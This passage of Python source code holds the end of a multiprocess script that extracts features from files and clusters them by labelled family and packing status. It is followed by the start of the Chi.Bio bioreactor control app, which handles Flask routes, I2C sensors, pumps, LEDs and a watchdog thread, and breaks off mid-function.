if fileinfo['obfuscation']:
labelled_packed += 1
else:
not_labelled += 1
if fileinfo['obfuscation'] is not None:
not_labelled_packed += 1
# Attempt to retrieve next file and continue loop
fileinfo = get_fileinfo_from_done_queue(done_queue)
# Return statistics:
return {
'correctly_labelled': correctly_labelled,
'incorrectly_labelled': incorrectly_labelled,
'not_labelled': not_labelled,
'not_labelled_packed': not_labelled_packed,
'labelled_packed': labelled_packed,
'incoming_files_parsed': incoming_files_parsed,
'fast_clustered': fast_clustered,
'fast_clustered_incoming': fast_clustered_incoming,
'slow_clustered': slow_clustered,
'slow_clustered_incoming': slow_clustered_incoming
}
def save_to_pickles(folder):
"""
Save data to pickles to allow later processing.
Folder should be the path to a folder where the
files "files.pkl" and "clusters.pkl" will be stored.
Suggested values for folder:
pickles/extracted/
pickles/clustered/
pickles/validated/
"""
global files
global clusters
if not os.path.exists(folder):
os.makedirs(folder)
files_path = os.path.join(folder, 'files.pkl')
clusters_path = os.path.join(folder, 'clusters.pkl')
with open(files_path, 'wb') as picklefile:
pickle.dump(files, picklefile)
with open(clusters_path, 'wb') as picklefile:
pickle.dump(clusters, picklefile)
def load_from_pickles(folder, load_clusters=False):
"""
Load data from pickles
Folder should be the path to a folder where the
files "files.pkl" and "clusters.pkl" will be stored.
Suggested values:
pickles/extracted/
pickles/clustered/
pickles/validated/
If load_clusters is True, clusters will also be loaded
Returns False on failure to load pickles and True on success
"""
global files
global clusters
files_path = os.path.join(folder, 'files.pkl')
clusters_path = os.path.join(folder, 'clusters.pkl')
if not os.path.exists(files_path):
print("Files pickle not found. Perform feature extraction before attempting to cluster / validate.")
return False
else:
with open(files_path, 'rb') as picklefile:
files = pickle.load(picklefile)
if load_clusters and not os.path.exists(clusters_path):
print("Clusters pickle not found. Perform training before attempting to validate.")
return False
elif load_clusters:
with open(clusters_path, 'rb') as picklefile:
clusters = pickle.load(picklefile)
return True
# If main script (not another thread/process)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run feature extraction/clustering')
parser.add_argument('-N', '--number-of-workers', type=int, default=multiprocessing.cpu_count(), help='Integer specifying the number of feature extraction threads')
parser.add_argument('-E', '--extraction-list', help='Path to a text file containing filepaths to files that should have their features extracted (for clustering), where each line consists of <path> <family>. Path must not contain any spaces.')
parser.add_argument('-C', '--cluster', action='store_true', help='Do clustering on files where features have been extracted.')
parser.add_argument('-T', '--train-list', help='Equivalent of -E <filename> -C. Path to a text file containing filepaths to files in training set, where each line consists of <path> <family>. Path must not contain any spaces.')
parser.add_argument('-V', '--validation-list', help='Path to a text file containing filepaths to files in validation (testing) set, where each line consists of <path> <family>. Path must not contain any spaces.')
args = parser.parse_args()
# Fill list with files that should be sent to analysis
files_for_analysis = []
filename = None
mark_as_training = False
do_extraction = False
do_clustering = args.cluster
do_validation = False
if args.train_list is not None:
filename = args.train_list
mark_as_training = True
do_extraction = True
do_clustering = True
if args.extraction_list is not None:
filename = args.extraction_list
mark_as_training = True
do_extraction = True
if args.validation_list is not None:
filename = args.validation_list
do_validation = True
if do_extraction or do_validation:
# Load paths and families from file and process the files
with open(filename, 'r') as infile:
lines = infile.read().splitlines()
for line in lines:
path, fam = line.split(' ')
files_for_analysis.append({'path': path, 'family': fam})
number_of_files = len(files_for_analysis)
if not number_of_files:
print("No files to analyse")
raise SystemExit
# If filepaths have been loaded
# Create queue daemon for files to perform feature extraction on
multiprocessing.Process(target=serve_simple_queue, args=(QUEUE_MANAGER_IP, JOB_MANAGER_PORT, QUEUE_MANAGER_KEY), daemon=True).start()
# Create queue daemon for files to perform clustering on
multiprocessing.Process(target=serve_simple_queue, args=(QUEUE_MANAGER_IP, DONE_MANAGER_PORT, QUEUE_MANAGER_KEY), daemon=True).start()
# Sleep for 0.2 seconds to ensure the queues are running
time.sleep(0.2)
# Note: args is the list itself (not a 1-tuple), so each fileinfo dict is passed as a separate positional argument and collected by *file_list in add_files_for_extraction.
multiprocessing.Process(target=add_files_for_extraction, args=(files_for_analysis), daemon=True).start()
# Create worker processes that retrieve files from the feature extraction queue,
# extract their features and add the results to the clustering (done) queue.
for i in range(args.number_of_workers):
multiprocessing.Process(target=feature_extraction_worker, args=(mark_as_training,), daemon=True).start()
if do_extraction:
# Store files coming from feature extraction job done queue.
collect_features(files)
# Save file features to pickles
save_to_pickles('pickles/extracted/')
if do_clustering:
# Load file features from pickles
if do_extraction or load_from_pickles('pickles/extracted/'):
# Cluster the files based on extracted features
clustering.cluster_files(files, clusters)
# Label the created clusters
clustering.label_clusters(files, clusters)
clustering_statistics = clustering.analyse_clustered_files(files)
clustering_statistics.update(clustering.analyse_clusters(files, clusters))
for key, val in clustering_statistics.items():
print(str(key) + ": " + str(val))
# Save updated file information and clusters to pickles.
save_to_pickles('pickles/clustered/')
if do_validation:
# Load files and clusters from training
if load_from_pickles('pickles/clustered/', True):
# Perform feature extraction, cluster and label
# files coming from feature extraction job done queue.
validation_statistics = cluster_and_validate_incoming(files, clusters)
# Calculate number of files not parsed
validation_statistics['non_parsed_files'] = number_of_files - validation_statistics['incoming_files_parsed']
# Collect statistics on clusters after validation
validation_statistics.update(clustering.analyse_clustered_files(files))
validation_statistics.update(clustering.analyse_clusters(files, clusters))
# Print statistics when done:
for key, val in validation_statistics.items():
print(str(key) + ": " + str(val))
# Save updated file information and clusters to pickles
save_to_pickles('pickles/validated/')
|
app_original.py
|
######### Chi.Bio Operating System V1.0 #########
#Import required python packages
import os
import random
import time
import math
from flask import Flask, render_template, jsonify
from threading import Thread, Lock
import threading
import numpy as np
from datetime import datetime, date
import Adafruit_GPIO.I2C as I2C
import Adafruit_BBIO.GPIO as GPIO
import time
import serial
import simplejson
import copy
import csv
import smbus2 as smbus
application = Flask(__name__)
application.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 #Try this https://stackoverflow.com/questions/23112316/using-flask-how-do-i-modify-the-cache-control-header-for-all-output/23115561#23115561
lock=Lock()
#Initialise data structures.
#Sysdata is a structure created for each device and contains the setup / measured data related to that device during an experiment. All of this information is passed into the user interface during an experiment.
sysData = {'M0' : {
'UIDevice' : 'M0',
'present' : 0,
'presentDevices' : { 'M0' : 0,'M1' : 0,'M2' : 0,'M3' : 0,'M4' : 0,'M5' : 0,'M6' : 0,'M7' : 0},
'Version' : {'value' : 'Turbidostat V3.0'},
'DeviceID' : '',
'time' : {'record' : []},
'LEDA' : {'WL' : '395', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDB' : {'WL' : '457', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDC' : {'WL' : '500', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDD' : {'WL' : '523', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDE' : {'WL' : '595', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDF' : {'WL' : '623', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDG' : {'WL' : '6500K', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LASER650' : {'name' : 'LASER650', 'default': 0.5, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'UV' : {'WL' : 'UV', 'default': 0.5, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'Heat' : {'default': 0.0, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0,'record' : []},
'Thermostat' : {'default': 37.0, 'target' : 0.0, 'max': 50.0, 'min' : 0.0,'ON' : 0,'record' : [],'cycleTime' : 30.0, 'Integral' : 0.0,'last' : -1},
'Experiment' : {'indicator' : 'USR0', 'startTime' : 'Waiting', 'startTimeRaw' : 0, 'ON' : 0,'cycles' : 0, 'cycleTime' : 60.0,'threadCount' : 0},
'Terminal' : {'text' : ''},
'AS7341' : {
'spectrum' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0, 'NIR' : 0,'DARK' : 0,'ExtGPIO' : 0, 'ExtINT' : 0, 'FLICKER' : 0},
'channels' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0, 'NIR' : 0,'DARK' : 0,'ExtGPIO' : 0, 'ExtINT' : 0, 'FLICKER' : 0},
'current' : {'ADC0': 0,'ADC1': 0,'ADC2': 0,'ADC3': 0,'ADC4': 0,'ADC5' : 0}},
'ThermometerInternal' : {'current' : 0.0,'record' : []},
'ThermometerExternal' : {'current' : 0.0,'record' : []},
'ThermometerIR' : {'current' : 0.0,'record' : []},
'OD' : {'current' : 0.0,'target' : 0.5,'default' : 0.5,'max': 10, 'min' : 0,'record' : [],'targetrecord' : [],'Measuring' : 0, 'ON' : 0,'Integral' : 0.0,'Integral2' : 0.0,'device' : 'LASER650'},
'OD0' : {'target' : 0.0,'raw' : 0.0,'max' : 100000.0,'min': 0.0,'LASERb' : 1.833 ,'LASERa' : 0.226, 'LEDFa' : 0.673, 'LEDAa' : 7.0 },
'Chemostat' : {'ON' : 0, 'p1' : 0.0, 'p2' : 0.1},
'Zigzag': {'ON' : 0, 'Zig' : 0.04,'target' : 0.0,'SwitchPoint' : 0},
'GrowthRate': {'current' : 0.0,'record' : [],'default' : 2.0},
'Volume' : {'target' : 20.0,'max' : 50.0, 'min' : 0.0,'ON' : 0},
'Pump1' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Pump2' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Pump3' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Pump4' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Stir' : {'target' : 0.0,'default' : 0.5,'max': 1.0, 'min' : 0.0, 'ON' : 0},
'Light' : {'target' : 0.0,'default' : 0.5,'max': 1.0, 'min' : 0.0, 'ON' : 0, 'Excite' : 'LEDD', 'record' : []},
'Custom' : {'Status' : 0.0,'default' : 0.0,'Program': 'C1', 'ON' : 0,'param1' : 0, 'param2' : 0, 'param3' : 0.0, 'record' : []},
'FP1' : {'ON' : 0 ,'LED' : 0,'BaseBand' : 0, 'Emit11Band' : 0,'Emit2Band' : 0,'Base' : 0, 'Emit11' : 0,'Emit2' : 0,'BaseRecord' : 0, 'Emit1Record' : 0,'Emit2Record' : 0 ,'Gain' : 0},
'FP2' : {'ON' : 0 ,'LED' : 0,'BaseBand' : 0, 'Emit11Band' : 0,'Emit2Band' : 0,'Base' : 0, 'Emit11' : 0,'Emit2' : 0,'BaseRecord' : 0, 'Emit1Record' : 0,'Emit2Record' : 0 ,'Gain' : 0},
'FP3' : {'ON' : 0 ,'LED' : 0,'BaseBand' : 0, 'Emit11Band' : 0,'Emit2Band' : 0,'Base' : 0, 'Emit11' : 0,'Emit2' : 0,'BaseRecord' : 0, 'Emit1Record' : 0,'Emit2Record' : 0 ,'Gain' : 0},
'biofilm' : {'LEDA' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDB' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDC' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDD' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDE' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDF' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDG' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LASER650' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0}}
}}
#sysDevices is unique to each device and stores the information required for digital communications and various automation functions. These values are kept outside sysData since they cannot be passed to the HTML interface using the jsonify package.
sysDevices = {'M0' : {
'AS7341' : {'device' : 0},
'ThermometerInternal' : {'device' : 0},
'ThermometerExternal' : {'device' : 0},
'ThermometerIR' : {'device' : 0,'address' :0},
'DAC' : {'device' : 0},
'Pumps' : {'device' : 0,'startup' : 0, 'frequency' : 0},
'PWM' : {'device' : 0,'startup' : 0, 'frequency' : 0},
'Pump1' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Pump2' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Pump3' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Pump4' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Experiment' : {'thread' : 0},
'Thermostat' : {'thread' : 0,'threadCount' : 0},
}}
for M in ['M1','M2','M3','M4','M5','M6','M7']:
sysData[M]=copy.deepcopy(sysData['M0'])
sysDevices[M]=copy.deepcopy(sysDevices['M0'])
#sysItems stores information about digital addresses which is used as a reference for all devices.
sysItems = {
'DAC' : {'LEDA' : '00000100','LEDB' : '00000000','LEDC' : '00000110','LEDD' : '00000001','LEDE' : '00000101','LEDF' : '00000011','LEDG' : '00000010','LASER650' : '00000111'},
'Multiplexer' : {'device' : 0 , 'M0' : '00000001','M1' : '00000010','M2' : '00000100','M3' : '00001000','M4' : '00010000','M5' : '00100000','M6' : '01000000','M7' : '10000000'},
'UIDevice' : 'M0',
'Watchdog' : {'pin' : 'P8_11','thread' : 0,'ON' : 1},
'FailCount' : 0,
'All' : {'ONL' : 0xFA, 'ONH' : 0xFB, 'OFFL' : 0xFC, 'OFFH' : 0xFD},
'Stir' : {'ONL' : 0x06, 'ONH' : 0x07, 'OFFL' : 0x08, 'OFFH' : 0x09},
'Heat' : {'ONL' : 0x3E, 'ONH' : 0x3F, 'OFFL' : 0x40, 'OFFH' : 0x41},
'UV' : {'ONL' : 0x42, 'ONH' : 0x43, 'OFFL' : 0x44, 'OFFH' : 0x45},
'LEDA' : {'ONL' : 0x0E, 'ONH' : 0x0F, 'OFFL' : 0x10, 'OFFH' : 0x11},
'LEDB' : {'ONL' : 0x16, 'ONH' : 0x17, 'OFFL' : 0x18, 'OFFH' : 0x19},
'LEDC' : {'ONL' : 0x0A, 'ONH' : 0x0B, 'OFFL' : 0x0C, 'OFFH' : 0x0D},
'LEDD' : {'ONL' : 0x1A, 'ONH' : 0x1B, 'OFFL' : 0x1C, 'OFFH' : 0x1D},
'LEDE' : {'ONL' : 0x22, 'ONH' : 0x23, 'OFFL' : 0x24, 'OFFH' : 0x25},
'LEDF' : {'ONL' : 0x1E, 'ONH' : 0x1F, 'OFFL' : 0x20, 'OFFH' : 0x21},
'LEDG' : {'ONL' : 0x12, 'ONH' : 0x13, 'OFFL' : 0x14, 'OFFH' : 0x15},
'Pump1' : {
'In1' : {'ONL' : 0x06, 'ONH' : 0x07, 'OFFL' : 0x08, 'OFFH' : 0x09},
'In2' : {'ONL' : 0x0A, 'ONH' : 0x0B, 'OFFL' : 0x0C, 'OFFH' : 0x0D},
},
'Pump2' : {
'In1' : {'ONL' : 0x0E, 'ONH' : 0x0F, 'OFFL' : 0x10, 'OFFH' : 0x11},
'In2' : {'ONL' : 0x12, 'ONH' : 0x13, 'OFFL' : 0x14, 'OFFH' : 0x15},
},
'Pump3' : {
'In1' : {'ONL' : 0x16, 'ONH' : 0x17, 'OFFL' : 0x18, 'OFFH' : 0x19},
'In2' : {'ONL' : 0x1A, 'ONH' : 0x1B, 'OFFL' : 0x1C, 'OFFH' : 0x1D},
},
'Pump4' : {
'In1' : {'ONL' : 0x1E, 'ONH' : 0x1F, 'OFFL' : 0x20, 'OFFH' : 0x21},
'In2' : {'ONL' : 0x22, 'ONH' : 0x23, 'OFFL' : 0x24, 'OFFH' : 0x25},
},
'AS7341' : {
'0x00' : {'A' : 'nm470', 'B' : 'U'},
'0x01' : {'A' : 'U', 'B' : 'nm410'},
'0x02' : {'A' : 'U', 'B' : 'U'},
'0x03' : {'A' : 'nm670', 'B' : 'U'},
'0x04' : {'A' : 'U', 'B' : 'nm583'},
'0x05' : {'A' : 'nm510', 'B' : 'nm440'},
'0x06' : {'A' : 'nm550', 'B' : 'U'},
'0x07' : {'A' : 'U', 'B' : 'nm620'},
'0x08' : {'A' : 'CLEAR', 'B' : 'U'},
'0x09' : {'A' : 'nm550', 'B' : 'U'},
'0x0A' : {'A' : 'U', 'B' : 'nm620'},
'0x0B' : {'A' : 'U', 'B' : 'U'},
'0x0C' : {'A' : 'nm440', 'B' : 'U'},
'0x0D' : {'A' : 'U', 'B' : 'nm510'},
'0x0E' : {'A' : 'nm583', 'B' : 'nm670'},
'0x0F' : {'A' : 'nm470', 'B' : 'U'},
'0x10' : {'A' : 'ExtGPIO', 'B' : 'nm410'},
'0x11' : {'A' : 'CLEAR', 'B' : 'ExtINT'},
'0x12' : {'A' : 'DARK', 'B' : 'U'},
'0x13' : {'A' : 'FLICKER', 'B' : 'NIR'},
}
}
# This section of code is responsible for the watchdog circuit. The circuit is implemented in hardware on the control computer, and requires the watchdog pin be toggled low->high each second, otherwise it will power down all connected devices. This section is therefore critical to operation of the device.
def runWatchdog():
#Watchdog timing function which continually runs in a thread.
global sysItems;
if (sysItems['Watchdog']['ON']==1):
#sysItems['Watchdog']['thread']
toggleWatchdog();
time.sleep(0.15)
sysItems['Watchdog']['thread']=Thread(target = runWatchdog, args=())
sysItems['Watchdog']['thread'].setDaemon(True)
sysItems['Watchdog']['thread'].start();
def toggleWatchdog():
#Toggle the watchdog
global sysItems;
GPIO.output(sysItems['Watchdog']['pin'], GPIO.HIGH)
time.sleep(0.05)
GPIO.output(sysItems['Watchdog']['pin'], GPIO.LOW)
GPIO.setup(sysItems['Watchdog']['pin'], GPIO.OUT)
print(str(datetime.now()) + ' Starting watchdog')
sysItems['Watchdog']['thread']=Thread(target = runWatchdog, args=())
sysItems['Watchdog']['thread'].setDaemon(True)
sysItems['Watchdog']['thread'].start();
GPIO.setup('P8_15', GPIO.OUT) #This output connects to the RESET pin on the I2C Multiplexer.
GPIO.output('P8_15', GPIO.HIGH)
GPIO.setup('P8_17', GPIO.OUT) #This output connects to D input of the D-Latch
GPIO.output('P8_17', GPIO.HIGH)
def initialise(M):
#Function that initialises all parameters / clears stored values for a given device.
#If you want to record/add values to sysData, recommend adding an initialisation line in here.
global sysData;
global sysItems;
global sysDevices
for LED in ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG']:
sysData[M][LED]['target']=sysData[M][LED]['default']
sysData[M][LED]['ON']=0
sysData[M]['UV']['target']=sysData[M]['UV']['default']
sysData[M]['UV']['ON']=0
sysData[M]['LASER650']['target']=sysData[M]['LASER650']['default']
sysData[M]['LASER650']['ON']=0
FP='FP1'
sysData[M][FP]['ON']=0
sysData[M][FP]['LED']="LEDB"
sysData[M][FP]['Base']=0
sysData[M][FP]['Emit1']=0
sysData[M][FP]['Emit2']=0
sysData[M][FP]['BaseBand']="CLEAR"
sysData[M][FP]['Emit1Band']="nm510"
sysData[M][FP]['Emit2Band']="nm550"
sysData[M][FP]['Gain']="x10"
sysData[M][FP]['BaseRecord']=[]
sysData[M][FP]['Emit1Record']=[]
sysData[M][FP]['Emit2Record']=[]
FP='FP2'
sysData[M][FP]['ON']=0
sysData[M][FP]['LED']="LEDD"
sysData[M][FP]['Base']=0
sysData[M][FP]['Emit1']=0
sysData[M][FP]['Emit2']=0
sysData[M][FP]['BaseBand']="CLEAR"
sysData[M][FP]['Emit1Band']="nm583"
sysData[M][FP]['Emit2Band']="nm620"
sysData[M][FP]['BaseRecord']=[]
sysData[M][FP]['Emit1Record']=[]
sysData[M][FP]['Emit2Record']=[]
sysData[M][FP]['Gain']="x10"
FP='FP3'
sysData[M][FP]['ON']=0
sysData[M][FP]['LED']="LEDE"
sysData[M][FP]['Base']=0
sysData[M][FP]['Emit1']=0
sysData[M][FP]['Emit2']=0
sysData[M][FP]['BaseBand']="CLEAR"
sysData[M][FP]['Emit1Band']="nm620"
sysData[M][FP]['Emit2Band']="nm670"
sysData[M][FP]['BaseRecord']=[]
sysData[M][FP]['Emit1Record']=[]
sysData[M][FP]['Emit2Record']=[]
sysData[M][FP]['Gain']="x10"
for PUMP in ['Pump1','Pump2','Pump3','Pump4']:
sysData[M][PUMP]['default']=0.0;
sysData[M][PUMP]['target']=sysData[M][PUMP]['default']
sysData[M][PUMP]['ON']=0
sysData[M][PUMP]['direction']=1.0
sysDevices[M][PUMP]['threadCount']=0
sysDevices[M][PUMP]['active']=0
sysData[M]['Heat']['default']=0;
sysData[M]['Heat']['target']=sysData[M]['Heat']['default']
sysData[M]['Heat']['ON']=0
sysData[M]['Thermostat']['default']=37.0;
sysData[M]['Thermostat']['target']=sysData[M]['Thermostat']['default']
sysData[M]['Thermostat']['ON']=0
sysData[M]['Thermostat']['Integral']=0
sysData[M]['Thermostat']['last']=-1
sysData[M]['Stir']['target']=sysData[M]['Stir']['default']
sysData[M]['Stir']['ON']=0
sysData[M]['Light']['target']=sysData[M]['Light']['default']
sysData[M]['Light']['ON']=0
sysData[M]['Light']['Excite']='LEDD'
sysData[M]['Custom']['Status']=sysData[M]['Custom']['default']
sysData[M]['Custom']['ON']=0
sysData[M]['Custom']['Program']='C1'
sysData[M]['Custom']['param1']=0.0
sysData[M]['Custom']['param2']=0.0
sysData[M]['Custom']['param3']=0.0
sysData[M]['OD']['current']=0.0
sysData[M]['OD']['target']=sysData[M]['OD']['default'];
sysData[M]['OD0']['target']=65000.0
sysData[M]['OD0']['raw']=65000.0
sysData[M]['OD']['device']='LASER650'
#sysData[M]['OD']['device']='LEDA'
#if (M=='M0'):
# sysData[M]['OD']['device']='LEDA'
sysData[M]['Volume']['target']=20.0
clearTerminal(M)
addTerminal(M,'System Initialised')
sysData[M]['Experiment']['ON']=0
sysData[M]['Experiment']['cycles']=0
sysData[M]['Experiment']['threadCount']=0
sysData[M]['Experiment']['startTime']=' Waiting '
sysData[M]['Experiment']['startTimeRaw']=0
sysData[M]['OD']['ON']=0
sysData[M]['OD']['Measuring']=0
sysData[M]['OD']['Integral']=0.0
sysData[M]['OD']['Integral2']=0.0
sysData[M]['Zigzag']['ON']=0
sysData[M]['Zigzag']['target']=0.0
sysData[M]['Zigzag']['SwitchPoint']=0
sysData[M]['GrowthRate']['current']=sysData[M]['GrowthRate']['default']
sysDevices[M]['Thermostat']['threadCount']=0
channels=['nm410','nm440','nm470','nm510','nm550','nm583','nm620', 'nm670','CLEAR','NIR','DARK','ExtGPIO', 'ExtINT' , 'FLICKER']
for channel in channels:
sysData[M]['AS7341']['channels'][channel]=0
sysData[M]['AS7341']['spectrum'][channel]=0
DACS=['ADC0', 'ADC1', 'ADC2', 'ADC3', 'ADC4', 'ADC5']
for DAC in DACS:
sysData[M]['AS7341']['current'][DAC]=0
sysData[M]['ThermometerInternal']['current']=0.0
sysData[M]['ThermometerExternal']['current']=0.0
sysData[M]['ThermometerIR']['current']=0.0
sysData[M]['time']['record']=[]
sysData[M]['OD']['record']=[]
sysData[M]['OD']['targetrecord']=[]
sysData[M]['Pump1']['record']=[]
sysData[M]['Pump2']['record']=[]
sysData[M]['Pump3']['record']=[]
sysData[M]['Pump4']['record']=[]
sysData[M]['Heat']['record']=[]
sysData[M]['Light']['record']=[]
sysData[M]['ThermometerInternal']['record']=[]
sysData[M]['ThermometerExternal']['record']=[]
sysData[M]['ThermometerIR']['record']=[]
sysData[M]['Thermostat']['record']=[]
sysData[M]['GrowthRate']['record']=[]
sysDevices[M]['ThermometerInternal']['device']=I2C.get_i2c_device(0x18,2) #Get Thermometer on Bus 2!!!
sysDevices[M]['ThermometerExternal']['device']=I2C.get_i2c_device(0x1b,2) #Get Thermometer on Bus 2!!!
sysDevices[M]['DAC']['device']=I2C.get_i2c_device(0x48,2) #Get DAC on Bus 2!!!
sysDevices[M]['AS7341']['device']=I2C.get_i2c_device(0x39,2) #Get OD Chip on Bus 2!!!!!
sysDevices[M]['Pumps']['device']=I2C.get_i2c_device(0x61,2) #Get pump PWM driver on Bus 2
sysDevices[M]['Pumps']['startup']=0
sysDevices[M]['Pumps']['frequency']=0x1e #200Hz PWM frequency
sysDevices[M]['PWM']['device']=I2C.get_i2c_device(0x60,2) #Get main PWM driver (stir/heat/UV/LEDs) on Bus 2
sysDevices[M]['PWM']['startup']=0
sysDevices[M]['PWM']['frequency']=0x03# 0x14 = 300hz, 0x03 is 1526 Hz PWM frequency for fan/LEDs, maximum possible. Potentially dial this down if you are getting audible ringing in the device!
#There is a tradeoff between large frequencies which can make capacitors in the 6V power regulation oscillate audibly, and small frequencies which result in the number of LED "ON" cycles varying during measurements.
sysDevices[M]['ThermometerIR']['device']=smbus.SMBus(bus=2) #Set up SMBus thermometer
sysDevices[M]['ThermometerIR']['address']=0x5a
# This section of commented code is used for testing I2C communication integrity.
# sysData[M]['present']=1
# getData=I2CCom(M,'ThermometerInternal',1,16,0x05,0,0)
# i=0
# while (1==1):
# i=i+1
# if (i%1000==1):
# print(str(i))
# sysDevices[M]['ThermometerInternal']['device'].readU8(int(0x05))
# getData=I2CCom(M,which,1,16,0x05,0,0)
scanDevices(M)
if(sysData[M]['present']==1):
turnEverythingOff(M)
print(str(datetime.now()) + " Initialised " + str(M) +', Device ID: ' + sysData[M]['DeviceID'])
def initialiseAll():
# Initialisation function which runs when the software is started for the first time.
sysItems['Multiplexer']['device']=I2C.get_i2c_device(0x74,2)
sysItems['FailCount']=0
time.sleep(2.0) #This wait is to allow the watchdog circuit to boot.
print(str(datetime.now()) + ' Initialising devices')
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
initialise(M)
scanDevices("all")
def turnEverythingOff(M):
# Function which turns off all actuation/hardware.
for LED in ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG']:
sysData[M][LED]['ON']=0
sysData[M]['LASER650']['ON']=0
sysData[M]['Pump1']['ON']=0
sysData[M]['Pump2']['ON']=0
sysData[M]['Pump3']['ON']=0
sysData[M]['Pump4']['ON']=0
sysData[M]['Stir']['ON']=0
sysData[M]['Heat']['ON']=0
sysData[M]['UV']['ON']=0
I2CCom(M,'DAC',0,8,int('00000000',2),int('00000000',2),0)#Sets all DAC Channels to zero!!!
setPWM(M,'PWM',sysItems['All'],0,0)
setPWM(M,'Pumps',sysItems['All'],0,0)
SetOutputOn(M,'Stir',0)
SetOutputOn(M,'Thermostat',0)
SetOutputOn(M,'Heat',0)
SetOutputOn(M,'UV',0)
SetOutputOn(M,'Pump1',0)
SetOutputOn(M,'Pump2',0)
SetOutputOn(M,'Pump3',0)
SetOutputOn(M,'Pump4',0)
@application.route('/')
def index():
#Function responsible for sending appropriate device's data to user interface.
global sysData
global sysItems
outputdata=sysData[sysItems['UIDevice']]
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
if sysData[M]['present']==1:
outputdata['presentDevices'][M]=1
else:
outputdata['presentDevices'][M]=0
return render_template('index.html',**outputdata)
@application.route('/getSysdata/')
def getSysdata():
#Similar to function above, packages data to be sent to UI.
global sysData
global sysItems
outputdata=sysData[sysItems['UIDevice']]
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
if sysData[M]['present']==1:
outputdata['presentDevices'][M]=1
else:
outputdata['presentDevices'][M]=0
return jsonify(outputdata)
@application.route('/changeDevice/<M>',methods=['POST'])
def changeDevice(M):
#Function responsible for changing which device is selected in the UI.
global sysData
global sysItems
M=str(M)
if sysData[M]['present']==1:
for Mb in ['M0','M1','M2','M3','M4','M5','M6','M7']:
sysData[Mb]['UIDevice']=M
sysItems['UIDevice']=M
return ('', 204)
@application.route('/scanDevices/<which>',methods=['POST'])
def scanDevices(which):
#Scans to decide which devices are plugged in/on. Does this by trying to communicate with their internal thermometers (if this communication fails, the software assumes the device is not present).
global sysData
which=str(which)
if which=="all":
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
sysData[M]['present']=1
I2CCom(M,'ThermometerInternal',1,16,0x05,0,0) #We arbitrarily poll the thermometer to see if anything is plugged in!
sysData[M]['DeviceID']=GetID(M)
else:
sysData[which]['present']=1
I2CCom(which,'ThermometerInternal',1,16,0x05,0,0)
sysData[which]['DeviceID']=GetID(which)
return ('', 204)
def GetID(M):
#Gets the Chi.Bio reactor's ID, which is basically just the unique ID of the infrared thermometer.
global sysData
M=str(M)
ID=''
